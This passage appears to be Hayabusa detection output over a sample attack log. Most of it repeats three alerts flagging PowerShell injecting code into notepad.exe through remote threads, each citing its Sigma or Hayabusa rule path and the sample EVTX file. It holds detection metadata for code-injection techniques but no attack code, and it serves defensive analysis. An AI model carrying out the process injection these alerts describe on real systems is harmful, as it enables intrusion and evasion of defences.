Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
